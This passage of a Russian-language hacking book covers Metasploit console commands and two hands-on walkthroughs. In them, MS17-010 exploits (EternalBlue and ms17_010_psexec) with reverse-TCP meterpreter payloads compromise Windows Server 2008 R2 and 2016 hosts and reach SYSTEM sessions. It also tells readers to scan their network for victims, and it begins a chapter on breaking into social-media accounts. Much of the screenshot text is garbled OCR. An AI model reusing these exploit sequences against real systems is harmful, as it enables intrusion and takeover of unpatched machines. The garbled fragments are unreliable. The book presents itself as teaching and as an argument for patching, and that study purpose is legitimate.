$\label{eq:high_standard} bitos://Metasploit.com} \\ = \begin{bmatrix} derispics > 0, derispication \\ + (702) explosits - 1123 auxilary - 352 post \\ (720) payloads - 45 encoders - 30 nops \\ + (7 evasian \\ +$	Гок 1	
= af weitsplicit Ve # 16-000 +		
Motosploit tip: After romming do more, be sure to check out the result of mores and solve $m_{2}^{-1}$		
esté > 1		
	<u>15.f6</u> > 1	

Рис. 7.4. Консоль готова к работе

Как видим, *nmap* выдала результаты сканирования. Nmap будет автоматически заполнять БД msf6. Можно также воспользоваться опциями -oX в *nmap*, чтобы сохранить результат сканирования в формате XML. Это полезно, если в дальнейшем ты планируешь использовать сторонние программы, такие как Dradis Framework, для работы с результатами.

Команда *db\_nmap* создает SQL запросы с различными столбцами таблицы, имеющие отношение к результатам проверки. После завершения сканирования *db\_nmap* сохраняет значения в базе данных. Сохранение результатов в виде таблиц упрощает обмен результатами как локально, так и со сторонними инструментами.



Рис. 7.5. Команда db\_птар в действии

3	-1	1.00	 ne [reot@ka	li]:/	) root@kali:-		Оболочна № 1	🕷 root - Фан	повый ме	07:44 ДЛ (АМ) О	1.10	0	A G
						болочна N							
	t. Fipa	вка В											
							wrpose info commen						18.5
90,156,152,133 90,156,152,133 90,156,152,133 90,156,152,133 90,156,152,133 90,156,152,133 90,156,152,133	22 80 514 5555 8000 8880												
95E6 5													

**Рис.** 7.6. Команды hosts и services

Для просмотра результатов сканирования используй команды *hosts* и *services* (старые названия *db\_hosts* и *db\_services*).

Первая команда выводит список просканированных узлов, вторая – список найденных на этих хостах сервисов.

**Примечание**. Посмотри на вывод **птар**, приведенный ранее. Ты должен учитывать, что без опций –*T4* –*A* –*v* сканер может неправильно определять назначение портов. Например:

[\*] Nmap: 3128/tcp open squid-http
[\*] Nmap: 5555/tcp open freeciv
[\*] Nmap: 8000/tcp open http-alt
[\*] Nmap: 8080/tcp open http-proxy

Порт 3128 определен как squid-http, порт 5555 – как freeciv, а порты 8000 и 8080 как http-alt и http-proxy соответственно. Если бы один из авторов этой книги не настраивал тестируемый узел (сканировать чужие узлы при написании книги – дурной тон), то можно было бы так и подумать. На самом деле порты 3128, 8000 и 8080 обслуживает веб-сервер Арасhe, то есть по сути – это веб-приложения, а порт 5555 – это не цивилизация, а всего лишь Bugzilla.

# 7.7. Практическое использование команд Metasploit

#### 7.7.1. Команда *help* – получение справки

Начнем с команды *help*, которая выводит список доступных команд.

Не нужно забывать о ней, поскольку она напомнит тебе о командах, которые ты позабыл:



msf6	> help	
Core	Commands	
====		
	Command	Description
E. Startes		
A State	?	Help menu
- 1 - E	back	Move back from the current context
	banner	Display an awesome metasploit banner
	cd	Change the current working directory
	connect	Communicate with a host
	exit	Exit the console
	help	Help menu
	info ·	Displays information about one or more module
( inter	irb	Drop into irb scripting mode
	jobs	Displays and manages jobs
	load	Load a framework plugin
	loadpath	Searches for and loads modules from a path
	quit	Exit the console
	resource	Run the commands stored in a file

Примечание. Здесь и далее мы будем опускать часть вывода Metasploit, поскольку его консоль может генерировать довольно длинный вывод, который публиковать в книге особо не хочется.

#### 7.7.2. Команда use – выбор модуля для использования

#### Команда *use* позволяет выбрать для работы определенный модуль.

#### Например:

```
use exploit/windows/smb/ms
use exploit/windows/smb/ms03_049_netapi
use exploit/windows/smb/ms04_007_killbill
use exploit/windows/smb/ms04_011_lsass
```

📉 🔚 🚍 🛄 🖕 🚺 🗁 mc [root@kall]// 📖 ro	oot@kali:	🗇 Оболони	a No 1	🔹 гоос Фізипльнії ме. — 08:53 ДЛ (АМ) 🖸 👘 🚊 💿 🛔 🚱
Файл Действия Правка Вид Справка				
. <u>esfő</u> > use exploit/windows/seb/ms				
Matching Modules				
# Name				Description
0 explost/windows/smb/ms03_049_netapi puterName_Overflow				M50) 049 Microsoft Workstation Service NetAddAlternateCom
1 exploit/windows/smb/ms04_987_killbill 2 exploit/windows/smb/ms04_011_isass				MS04-007 Microsoft ASN.1 Library Bitstring Acap Overflow MS04-011 Microsoft LSASS Service DsRolerUpgradeDownlovels
erver Overflow 3 exploit/windows/sub/mgds_01,petdde 6 exploit/windows/sub/mgds_01%_pop 5 exploit/windows/sub/msto_02/, raxmann_reg 6 exploit/windows/sub/msto_02/, rax 7 exploit/windows/sub/msto_02/, netapi	2004-10-12 2005-08-09 2006-06-13 2006-06-13 2006-06-13 2006-08-08			MSB4-031 Microsoft MelDBE Service Overflow MSB5-049 Microsoft Phug and Phay Service Deerflow MSB6-025 Microsoft PMAS Service AMAR Registry Overflow MSB6-026 Microsoft Service Service Overflow
Verflow 8 exploit/windows/smb/ms05_066_nwap1 9 exploit/windows/smb/ms05_060_nwwks 10 exploit/windows/smb/ms05_070_wkssvc	2006-11-14 2006-11-14 2006-11-14			ASB6-066 Microsoft Services mmapizzidli Monde Exploit ASB6-066 Microsoft Services mwwks dii Monde Exploit ASD6-078 Microsoft Werkitation Service NetgManagoTPCComme
11 exploit/windows/inb/ms07_029_msdns_zonename				MS0/-029 Microsoft DNS RPC Service extractquatedthact) Gy
12 exploit/windows/smb/ms08_067.netapi				MS08-067 Microsoft Server Service Relative Path Stack Cor
ruption 13 exploit/windows/amb/mseg_050_amb/_negotiate_func_index ion Table Dereference				MSD9-050 Arcrosoft SNV2.SYS SMR Negative Processiu Funct
14 exploit/windows/imb/mil0_046_shortcut_icon_dlloader 15 exploit/windows/imb/ms10_061_spoolss. Incrabitor	2010-07-16 2010-09-14			Microsoft Windows Shell LNR Code Execution MS10-B01 Microsoft MTINE Spooler Sprvice Impersonation Vo.
16 expleit/windows/smb/ms15_020_shortcut_icon_dlloader 17 expleit/windows/smb/ms17_010_etern&lblue 01/cm				Microsoft Windows Shell 1NK Lode Execution M017 ele EternalUlue SMD Remote Windows Kernel Pool Copru
16 explort/windows/smb/ms1/_010_cternalblue_wins				
19 menioit/windows/smb/mmi7_010_psexet B Remute Windows Code Execution				

Рис. 7.7. Команда изе

Примечание. Одна из особенностей консоли – автозавершение команд, подобно тому, которое используется в командной строке Linux. Просто начни вводить текст, а затем нажми **Таb**, и консоль или дополнит твою команду, или предложит несколько вариантов.

#### 7.7.3. Команда show – показ сущностей

Команда **show** покажет все доступные сущности (модули, опции, цели и т.д.). Команде **show** нужно передать тип сущности или слово *all*, чтобы вывести все установленные модули.

#### Вывод команды show all:



Вывод очень большой и может продолжаться несколько минут. Поэтому лучше всего изучать список модулей по группам. Доступны следующие группы:

- encoders; •
- nops;
- exploits; ٠
- payloads; •
- auxiliary; •
- post;
- plugins. ٠

Также в конце вывода show all выводится список установленных плагинов:

[*] Available Framework	plugins	al terior	
* rssfeed			
* salman		Physical Products	Contraction of the second
* sounds			
* auto add route			Mar Landson
* request	and the second second second		
* aggregator			
* msgrpc			
* msfd	a hand a series of the		and the second second
* nexpose			
* db credcollect			
* libnotify			
* thread			
* alias	and the second second		A CARE AND A SAME
* session tagger	Star Star Strangers		
* token_adduser			Sale has
* pcap_log			
* sample			
* beholder			
* socket_logger			and the second
* openvas			
* emap			and the second
* wiki			March 199
* event_tester			
* token_hunter	and the state of the		
* ffautoregen			
<b>F</b>			105

```
* session_notifier
* lab
* db_tracker
* ips filter
```

Наиболее часто ты будешь использовать команды:

show auxiliary show exploits show payloads

- Выполнение show auxiliary отобразит распечатку всех доступных вспомогательных модулей в пределах Metasploit. Как упомянуто более ранние, вспомогательные модули включают сканеры, модули отказа в обслуживании, фаззеры и т.п.
- Команда show exploits будет для тебя наиболее интересной. Выполни show exploits, чтобы получить распечатку всех эксплойтов, содержащихся в одной логической среде.
- Выполнение show payloads покажет все полезные нагрузки для всех платформ, доступных в пределах Metasploit. Команда show options покажет настройки модуля, если ты выбрал конкретный модуль.

Рассмотрим небольшой пример:

196

```
msf6> use exploit/windows/smb/ms03 049 netapi
[*] Using configured payload windows/meterpreter/reserse tcp
msf6> show options
Module options (exploit/windows/smb/ms03 049 netapi):
  Name Current Setting Required
                                       Description
  RHOSTS
                                       The target host(s), range ...
                          ves
  RPORT
            445
                                       The SMB service port (TCP)
                          yes
  SMBPIPE BROWSER
                                       The pipe name to use (BROWSER ...
                          yes
Payload options (windows/meterpreter/reserse tcp):
  Name Current Setting Required
                                       Description
  EXITFUNC thread
                                       Exit technique (Accepted ...
                          ves
  LHOST 192.168.84.136 yes
                                       The listen address (an interf ...
  LPORT
            4444
                                       The listen port
                          ves
Exploit target:
  Id
      Name
       Windows XP SP0/SP1
```

Как уже было отмечено, когда ты вводишь команду show payloads, то система показывает все доступные полезные нагрузки. Но если ты выбрал определенный модуль, тогда система отобразит полезные нагрузки только выбранного модуля, например:



Команда show targets позволяет просмотреть цели – на случай, если ты не уверен, что полезная нагрузка совместима с целевой системой:

Exploit targets: Id Name Windows XP SP0/SP1 0

Это довольно старенький эксплойт. Давай посмотрим на более новые варианты. Для этого используем команду *search*. Будем искать по названию уязвимости – *ethernalblue*:

msf6>search eternalblue Matching Modules Name Disclosure Date Rank Check Description auxiliary/admin/smb/ms17 010 command 2017-03-14 normal Yes MS17-010... auxiliary/scanner/smb/smb ms17 010 normal Yes MS17-010 ... exploit/windows/smb/ms17 010 eternalblue 2017-03-14 average No MS17-010... exploit/windows/smb/ms17 010 eternalblue win8 2017-03-14 average No ...

Попробуем использовать этот эксплойт:

back use exploit/windows/smb/ms17 010 eternalblue show targets



Этот эксплойт уже поновее. Также есть аналогичный эксплойт для Windows 8.

Команда *info* выведет подробную информацию о специфическом модуле, включая все опции, цели и другую информацию.

Вывод:

msf > info dos/windows/smb/ms09 001 write Name: Microsoft SRV.SYS WriteAndX Invalid DataOffset Version: 6890 License: Metasploit Framework License (BSD) Provided by: j.v.vallejo

Когда ты выбрал конкретный модуль, для его использования применяй команду *use*. Обрати внимание в выводе ниже на глобальную переменную, которая была установлена, в ранее уже установленной конфигурации (RPORT).

```
use dos/windows/smb/ms09_001_write
msf auxiliary(ms09_001_write) > show options
Module options:
Name Current Setting Required Description
RHOST yes The target address
RPORT 445 yes Set the SMB service port
```

Команда *connect* позволяет соединиться с IP-адресом (по номеру порта) из *msfconsole* так же, как если бы вы использовали netcat или telnet:

#### Вывод:

connect 192.168.1.1 23
[\*] Connected to 192.168.1.1:23
Hello
DD-WRT v44 std (c) 2018 NewMedia-NET GmbH
Release: 07/27/18 (SVN revision: 20011)
DD-WRT login:

#### 7.7.4. Команды set и setg – установка значений переменных

Команда **set** позволяет установить опцию модуля. Команда **setg** устанавливает глобальную опцию, заданное значение будет доступно для всех модулей.

Установить значение опции можно так:

set RHOST RHOST => msf auxil	<pre>set RHOST 192.168.1.1 RHOST =&gt; 192.168.1.1 msf auxiliary(ms09_001_write) &gt; show options</pre>								
Module op	tions:								
Name	Current Setting	Required	Description						
RHOST RPORT	192.168.1.1 445	yes yes	The target address Set the SMB service port						

Ты можешь устанавливать глобальные переменные в пределах msfconsole. Для этого используется команда *setg*, как уже было упомянуто. Как только они будут установлены, они станут доступны в эксплойтах и вспомогательных модулях. Также можно сохранить эти опции для использования в следующий раз. Но бывает и другая ситуация – когда ты установил глобальную переменную и забыл об этом. Установить локальную тоже забыл, в итоге ты вызываешь эксплойт с другими опциями, а не теми, что нужно. Команда *unsetg* используется для сброса глобальной переменной. Имена переменных в Metasploit не зависят от регистра. Мы используем заглавные символы (например, LHOST) для наглядности, но ты можешь этого не делать.

#### Примеры:

msf6 > setg LHOST 192.168.1.101 LHOST => 192.168.1.101 msf6 > setg RHOSTS 192.168.1.0/24 RHOSTS => 192.168.1.0/24 msf6 > setg RHOST 192.168.1.136 RHOST => 192.168.1.136 msf6 > save Saved configuration to: /root/.msf6/config msf6 >

Здесь мы не только установили глобальные переменные, но и сохранили их для последующего использования командой *save*.

#### 7.7.5. Команда check – проверка целевой системы

Очень полезной на практике является команда *check*, позволяющая проверить, уязвима ли целевая система для выбранного экплойта.

#### Вывод команды:

```
msf6 exploit (ms04 045 wins) > show options
Module options:
   Name Current Setting Required Description
  RHOST 192.168.1.114
                          yes
                                   The target address
  RPORT 42
                                    The target port
                           yes
Exploit target:
   Id Name
   2.2
     Windows 2000 English
   0
msf6 exploit (ms04 045 wins) > check
[-] Check failed: The connection was refused by the remote host
(192.168.1.114:42)
```

В данном случае целевая система не годится для проверки, поскольку соединение было закрыто удаленным узлом.

#### 7.7.6. Команда back – возврат

Когда ты закончишь работу с определенным модулем, введи команду **back** для возврата обратно.

Дальше ты сможешь выбрать другой модуль и продолжить работу.

#### 7.7.7. Команда *гип* – запуск эксплойта

Запустить подготовленный эксплойт можно командой run.

Вывод команды:

```
msf6 auxiliary(ms09_001_write) > run.
Attempting to crash the remote host...
datalenlow=65535 dataoffset=65535 fillersize=72
rescue
datalenlow=55535 dataoffset=65535 fillersize=72
rescue
datalenlow=45535 dataoffset=65535 fillersize=72
rescue
datalenlow=35535 dataoffset=65535 fillersize=72
rescue
datalenlow=25535 dataoffset=65535 fillersize=72
rescue
...
```

#### 7.7.8. Команда resource – определение ресурса

Некоторые виды атак, такие как Karmetasploit, используют файл с командами, которые можно загрузить через *msfconsole*, используя команду *resource*. Она последовательно выполняет команды в файле.

msf6 > resource karma.rc resource> load db sqlite3 [-] [-] The functionality previously provided by this plugin has been [-] integrated into the core command set. Use the new 'db driver' [-] command to use a database driver other than sqlite3 (which [-] is now the default). All of the old commands are the same. [-] [-] Failed to load plugin from /pentest/exploits/framework3/plugins/db sqlite3: Deprecated plugin resource> db create /root/karma.db [\*] The specified database already exists, connecting [\*] Successfully connected to the database. [\*] File: /root/karma.db resource> use auxiliary/server/browser autopwn resource> setg AUTOPWN HOST 10.0.0.1 AUTOPWN HOST => 10.0.0.1

#### 7.7.9. Команда irb

Выполнение этой команды переведет тебя в режим Ruby, где ты сможешь "на лету" писать скрипты и запускать команды:

msf6 > irb [\*] Starting IRB shell ... [\*] You are in the "framework" object >> puts "Hello, metasploit!" Hello, metasploit!

## 7.8. Практический пример 1: взламываем старенький сервер Windows 2008 с помощью эксплойта АНБ

Наконец-то мы добрались до самого интересного. Настало время собрать все воедино и использовать изученные команды на практике. Мы будем использовать эксплойт EternalBlue. EternalBlue – это эксплойт, который, скорее всего, был разработан АНБ в качестве бывшей уязвимости нулевого дня.

Он был выпущен в 2017 году хакерской группой Shadow Brokers, которая скандально известна утечками информации и эксплойтов из Equation Group, которая, как поговаривают, тесно связана с отделом АНБ ТАО (Tailored Access Operations).

Эксплойт EternalBlue также известен как MS17-010 представляет собой уязвимость в протоколе Microsoft Server Message Block (SMB). SMB позволяет системам совместно использовать доступ к файлам, принтерам и другие ресурсы в сети. Уязвимость присутствует в немного устаревших версиях SMB, позволяющую хакеру установить соединение с нулевым сеансом через анонимный вход. Затем хакер сможет отправлять модифицированные пакеты и выполнять произвольные команды на целевой системе.

В качестве жертвы мы будем использовать старенькую и непропатченную OC Windows Server 2008 R2. Чтобы повторить наш подвиг, тебе нужно скачать такую же. Не нужно думать, что это очень старая операционка – много организаций до сих пор используют ее даже в 2023 году, поскольку ряд кризисов не позволяет обновить железо и купить новый софт. Да и сама операционная система до сих пор (!) доступна для загрузки на сайте Microsoft:

https://www.microsoft.com/en-us/download/details.aspx?id=11093

По этой ссылке ты можешь скачать ее совершенно бесплатно (180-дневная версия).

Итак, запусти Metasploit. Это можно сделать или посредством графического интерфейса, или командой *msfconsole*. Далее мы попытаемся найти подходящие модули. Вывод мы сократили (он довольно "широкий", чтобы поместиться на книжном листе), поэтому мы оставили только названия модулей:

search eternalblue Matching Modules		
Name	Disclosuro Dato I	Pank
Name	Disclosule Date i	Kank
Check Description		
auxiliary/admin/smb/ms17 010	command	
ili autiliary autility only more or or o	7 010	
auxiliary/scanner/smb/smb_msl	./_010	a start from the second
exploit/windows/smb/ms17 010	eternalblue	
evoloit/windows/smb/ms17 010	eternalblue win8	
exploit, windows/ sho/msi/_010	cccindibilite_wind	A Contraction of the second
exploit/windows/smb/ms1/_010_	psexec	

Напротив каждого модуля есть описание, так что ты поймешь для чего используется тот или иной модуль.

Мы будем использовать модуль exploit/windows/smb/ms17\_010\_eternalblue:

use exploit/windows/smb/ms17\_010\_eternalblue

Просмотрим текущие параметры модуля с помощью команды options или show options:

Module options (exploit/windows/smb/ms17_010_eternalblue):							
Name	Current	Setting	Required	Description			
RHOSTS or CIDR identifier		yes	The	target.address range			
RPORT	445	yes	The	target port (TCP)			
SMBDomain	·	no	The	Windows domain to use			
for authenticatio	n	TESKE +					
SMBPass		no	The	password for the			
specified username							
SMBUser		no	The	username to			
authenticate as							
VERIFY_ARCH	true	yes	Che	eck if remote matches			
exploit Target.							
VERIFY_TARGET	true	yes	Chee	ck if remote OS matches			
exploit Target.							
Exploit target:							
T.J. March			With Children				
Id Name							
O Mindaus 7		2000 0	2 1 (1) 7	1) Country Decks			
· U windows /	and Serve	er 2008 R	Z (x64) A.	LI Service Packs			

Установим переменную rhosts - IP-адрес цели:

msf6> set rhosts 192.168.1.65
rhosts => 192.168.1.65

Далее мы будем использовать шелл reverse\_tcp в качестве полезной нагрузки:

```
msf6> set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse tcp
```

Установим ІР-адрес локальной машины и порт для прослушки:

msf6> set lhost 192.168.1.3
lhost => 192.168.1.3
msf6> set lport 4321
lport => 4321

Вводим команду run для запуска эксплойта:

```
msf6> run
[*] Started reverse TCP handler on 192.168.1.3:4321
[*] 192.168.1.65:445 - Connecting to target for exploitation.
[+] 192.168.1.65:445 - Connection established for exploitation.
[+] 192.168.1.65:445 - Target OS selected valid for OS indicated
by SMB reply
[*] 192.168.1.65:445 - CORE raw buffer dump (51 bytes)
[*] 192.168.1.65:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65
72 76 65 72 20 32 Windows Server 2
[*] 192.168.1.65:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61
6e 64 61 72 64 20 008 R2 Standard
[*] 192.168.1.65:445 - 0x00000020 37 36 30 31 20 53 65 72 76 69
63 65 20 50 61 63 7601 Service Pack
[*] 192.168.1.65:445 - 0x00000030 6b 20 31
k 1
[+] 192.168.1.65:445 - Target arch selected valid for arch
indicated by DCE/RPC reply
[*] 192.168.1.65:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.65:445 - Sending all but last fragment of exploit
packet
[*] 192.168.1.65:445 - Starting non-paged pool grooming
[+] 192.168.1.65:445 - Sending SMBv2 buffers
[+] 192.168.1.65:445 - Closing SMBv1 connection creating free hole
adjacent to SMBv2 buffer.
[*] 192.168.1.65:445 - Sending final SMBv2 buffers.
[*] 192.168.1.65:445 - Sending last fragment of exploit packet!
[*] 192.168.1.65:445 - Receiving response from exploit packet
[+] 192.168.1.65:445 - ETERNALBLUE overwrite completed
successfully (0xC00000D) !
[*] 192.168.1.65:445 - Sending egg to corrupted connection.
[*] 192.168.1.65:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 192.168.1.65
[*] Meterpreter session 1 opened (192.168.1.3:4321 ->
192.168.1.65:49207) at 2019-03-26 11:01:46 -0500
[+] 192.168.1.65:445 - =-=-=
[+] 192.168.1.65:445 - =-=-
                                         WIN-=
```

[+] 192.168.1.	:445
meterpreter	

Разберемся, что все это означает. Мы устанавливаем SMB-соединение и отправляем эксплойт-пакет. Наконец, мы видим WIN и открывается сеанс *meterpreter*. Другими словами, мы только что хакнули сервер. Конечно, если сервер пропатчен, что у нас ничего не выйдет, но так как мы скачали эталонную систему 2008 R2, где точно есть эта уязвимость, то у нас все получится. Только не обновляйте ее сразу после установки.

После того, как ты увидел приглашение *meterpreter*, ты можешь вводить любые команды, и они будут выполнены на удаленной (хакнутой) системе. Например, можем ввести команду *sysinfo* (самую безобидную):

sysinfo		NAR AND			The state			
Computer	+	S02						
OS		Windows	2008	R2	(Build	7601,	Service	Pack
1).								
Architecture		x64						
System Language		en_US					and the second	
Domain	•	DLAB						7
Logged On Users		2						
Meterpreter		x64/wind	ows					

Эксплойт не работает с новыми системами, но в некоторых случаях он может вызвать сбой удаленной системы. Хакнуть не хакнешь, но хоть сделаешь синий экран!

## 7.9. Практический пример 2: хакаем современные системы – Windows Server 2016 и Windows 10

EternalBlue пользовался успехом, но если старые системы нужно было патчить, то в новых все заплатки идут "из коробки" и данный экплойт не работает. Разработчиков экплойта это очень огорчило, и они разработали три подобных эксплойта – EternalRomance и EnternalSynergy (уязвимость CVE- 2017-0143) и EternalChampion (CVE-2017-0146). Все они были объединены в один модуль Metasploit, который также использует классическую полезную нагрузку psexec. Он считается более надежным, чем EternalBlue, с меньшей вероятностью приведет к сбою цели и работает во всех непропатченных версиях Windows Server 2016 и Windows 10/11.

Первым делом мы должны найти жертву. Если в прошлом случае мы использовали заведомо старую операционку (потому что у нас таких старых не было), то сейчас попробуем найти жертву в нашей локальной сети, используя **птар**. При этом мы запустим **птар** с опцией *--script* и будем использовать скрипт smb-vuln-ms17-010. Данный скрипт выполнит проверку на уязвимость. Заодно протестируем нашу сеть:

nmap --script smb-vuln-ms17-010 -v 192.168.1.1/24

Теперь нужно запастись терпением, пока **птар** просканирует всю сеть. Вывод скрипта, свидетельствующий о том, что уязвимость найдена, выглядит так:

```
Starting Nmap 7.70 ( https://nmap.org ) at 2020-12-10 11:05 MSK
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:05
Host script results:
| smb-vuln-ms17-010:
    VULNERABLE:
    Remote Code Execution vulnerability in Microsoft SMBv1 servers
(ms17 - 010)
     State: VULNERABLE
     IDs: CVE:CVE-2017-0143
     Risk factor: HIGH
     A critical remote code execution vulnerability exists in Microsoft SMBv1
         servers (ms17-010).
      Disclosure date: 2017-03-14
      References:
        https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
        https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-
guidance-for-wannacrypt-attacks/
        https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
```

NSE: Script Post-scanning. Initiating NSE at 11:05 Completed NSE at 11:05, 0.00s elapsed Read data files from: /usr/bin/../share/nmap . . .

Итак, жертва найдена. В нашем случае это Windows Server 2016 Datacenter Edition, IP-адрес 192.168.1.50.

Теперь нужно запустить консоль и найти подходящий модуль:

msfconsole search eternalromance Matching Modules Disclosure Date Rank Check Description Name auxiliary/admin/smb/ms17 010 command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution exploit/windows/smb/ms17 010 psexec 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

Фреймворк нашел два модуля. Мы будем использовать exploit/windows/smb/ ms17\_010\_psexec:

use exploit/windows/smb/ms17 010 psexec Просмотрим опции модуля:

options

Все параметры невозможно уместить на странице книги, поэтому приводим скриншот.

	🗧 🔝 🔤 🔚 👘 👘 mc [root@kali]:/ 🔅 root@kali:~		🗇 Обалоч	ка № 1	💌 root - Файловый ме., 12:26 ПП (РМ) 🗖 👘 🛕 💁 G-			
					×			
Файл Действия Правка Ви	и Справка							
msf6 exploit (windows/sub/act)								
Module options (exploit/windo								
				Required	Description			
DBGTRACE fals LEAKATTEMPTS 99 NAMEDPIPE				yes yes no	Show extra debug trace info. How many times to try to leak transaction A named pape that can be connected to (leave blank for a			
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_p RMOSTS				yes yes	List of named pipes to check The target host(s), range CIDR identifier, or hosts file			
with syntax 'file:cpath5' RPORT 445 SERVICE_DESCRIPTION				yes no	The Target port (TCP) Service description to to be used on target for pretty l			
19110 SERVICE UISPLAY RAME SERVICE UISM SURAL SURAL SURADASI SURADASI SURADASI SURAJA SURAJASI SURAJAS				no no yes	The service display name The service amm The share to connect to, can be an admin share (ADMIN\$,C The Windows domain to doe for authentication The passenged for the specified username The passenge to authenticate as			
				no 110 110				
Payload options (windows/mete								
Name Current Setting								
EXITFUNC thread yes Exit technique (Accepted: ", seh, thread, process, LHOST 192.168.84.136 yes The Listen address (an interface may be specified) LPORT 4444 yes The Listen part								
Exploit target:								
Ld Name								

Puc. 7.8. Параметры модуля exploit/windows/smb/ms17\_010\_psexec

Как и в прошлом случае, нам нужно установить удаленный узел, полезную нагрузку, локальную машину и локальный порт:

```
msf6> set rhosts 192.168.1.50
rhosts => 192.168.1.50
msf6> set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6> set lhost 192.168.1.3
lhost => 192.168.1.3
msf6> set lport 4321
lport => 4321
```

Все готово для запуска. Запускаем:

```
[*] Started reverse TCP handler on 192.168.1.3:4321
[*] 192.168.1.50:445 - Target OS: Windows Server 2016 Standard
Evaluation 14393
[*] 192.168.1.50:445 - Built a write-what-where primitive...
[+] 192.168.1.50:445 - Overwrite complete... SYSTEM session
obtained!
[*] 192.168.1.50:445 - Selecting PowerShell target
[*] 192.168.1.50:445 - Executing the payload...
```

```
[+] 192.168.1.50:445 - Service start timed out, OK if running
a command or non-service executable...
[*] Sending stage (206403 bytes) to 192.168.1.50
[*] Meterpreter session 2 opened (192.168.1.3:4321 ->
192.168.1.50:49965) at 2019-03-26 11:12:30 -0500
```

Итак, сессия *meterpreter* успешно установлена, и мы можем вводить команды, которые будут запущены на хакнутой системе:

sysinfo	the second s	
Computer	: DC01	
OS	: Windows 2016 (Build 14393).	
Architecture	: x64	
System Language	: en_US	
Domain	: DLAB	
Logged On Users	: 4	
Meterpreter	: x64/windows	

Примечательно, если мы введем getuid, чтобы получить UID пользователя, мы увидим, что мы работаем от имени системы:

Server username: NT AUTHORITY\SYSTEM

Как только что было показано, можно относительно легко взломать современную версию Windows Server, если она не была вовремя пропатчена. Если ты являешься сисадмином, то только что мы наглядно продемонстрировали, зачем нужно устанавливать заплатки безопасности и обновления. Продемонстрированная нами угроза до сих пор остается актуальной, поскольку далеко не все админы старательно относятся к своим обязанностям. В результате имеем огромную дыру в безопасности, через которую могут не только улетучиться данные (утечка), но и пострадать вся система.

## Глава 8.

## Взлом и защита аккаунтов в социальных сетях

В этой главе мы поговорим еще об одном интересном моменте – взломе страничек в социальных сетях. Расскажем, как взломать и как защититься от взлома.

### 8.1. Кто и зачем взламывает аккаунты

Существует различные причины взлома аккаунтов в соцсетях. В зависимости от причины взлома различают собственно взлом (когда хакер получает доступ к аккаунту жертвы) и так называемый "угон" аккаунта, когда хакер меняет пароль, привязывает другой телефон, чтобы жертва больше не могла войти в аккаунт.

Итак, выделим основные причины:

- Взлом ради взлома пользуется спросом у начинающих хакеров. Они просто тренируются. Для них важен сам взлом, а не желание кому-то нагадить. Конечно, бывают и не очень хорошие хакеры, которые сначала взламывают страничку, а потом постят на ней различные гадости. Здесь уж как повезет или не повезет жертве. Такой взлом может быть с угоном или без такового. Сложно прогнозировать новичка, который сначала ломает, а потом думает, что со всем этим делать. Так как никакой цели нету, после взлома со страничкой может произойти все что угодно – в зависимости от желания или настроения хакера.
- Бытовые причины ревность, желание контролировать любимого человека или ребенка. Как правило, такие взломы не сопровождаются угоном странички. Пароль никто не меняет, поскольку важно, чтобы жертва ничего не заподозрила и продолжала пользоваться аккаунтом. Хакеру интересно, с кем она общается, какие сообщения пишет и т.д. Думаю, здесь все понятно.
- Рассылка спама хакер взламывает страничку и затем постит с нее рекламу в ленту. Как правило, такой взлом сопровождается угоном ему важно,

чтобы реклама провисела как можно дольше, пока ее не удалят. Также ему важно, чтобы рекламу увидели как можно больше пользователей, поэтому для таких целей взламываются только популярные аккаунты, у которых много друзей и подписчиков. Хакер может выслеживать жертву – он может быть одним из ее подписчиков. Ему важно знать, когда жертва будет хотя бы несколько дней отсутствовать. Идеальный период - когда жертва едет в отпуск. Не поверишь, сколько людей сообщают об отпуске в социальной сети! Как минимум жертва будет в дороге 1-2 дня, и ей будет не до Интернета. А некоторые вообще на отдыхе отключают телефон, чтобы никто их не беспокоил. Следовательно, жертва будет отсутствовать вообще неделю. Конечно, пользователь обратится в службу поддержки, сообщит о взломе, предоставит документы, подтверждающие факт владения аккаунтом, ІРадреса, с которых он обычно входил, номер телефона и т.д. Аккаунт ему вернут, но чем позже это произойдет, тем лучше. Поэтому хакер поменяет не только пароль, но и номер телефона. Если такое произошло с твоей страничкой, не паникуй, а обратись в саппорт. Также не пытайся связаться с другого аккаунта с хакером. Он попросит деньги за возврат аккаунта, но не факт, что после оплаты он вернет аккаунт обратно. Скорее всего, нет. А служба поддержки социальной сети вернет тебе его совершенно бесплатно.

- Взлом с целью получения выкупа за аккаунт еще одна популярная причина взлома. У жертвы угоняют аккаунт, а потом на ее телефон приходит SMS, мол, за возврат аккаунта заплатите такую-то сумму. Иногда SMS может быть замаскировано под саму социальную сеть. Представь, что тебе приходит SMS от Facebook, в котором говорится, что за незаконные действия с аккаунтом его заблокировали и за разблокировку нужно оплатить штраф 1000 рублей. Если твой аккаунт заблокирует социальная сеть, то она уже не разблокирует его за никакие деньги. 100% это мошенники, поэтому нужно связаться по официальным каналам (а не по тем, которые приводятся в письме) со службой поддержки социальной сети.
- Взлом с целью продажи наверное, ты заметил частые объявления о аренде аккаунтов. Рекламщики берут в аренду твой аккаунт и производят свои манипуляции от твоего имени – ставят лайки за проплаченные посты, подписываются на страницы и т.д. Хакеры могут взломать и продать рекламщикам твой аккаунт. Пока ты будешь восстанавливать доступ, ты уже будешь подписан на тысячи всевозможных страниц. Некоторые пользователи из-за этого заводят себе новые аккаунты, чтобы не отписываться от всего этого и не снимать все проставленные лайки, так как это убьет кучу времени. Взлому подвергаются как популярные, так и

не очень аккаунты. Здесь важен просто аккаунт, а количество друзей – это второстепенно.

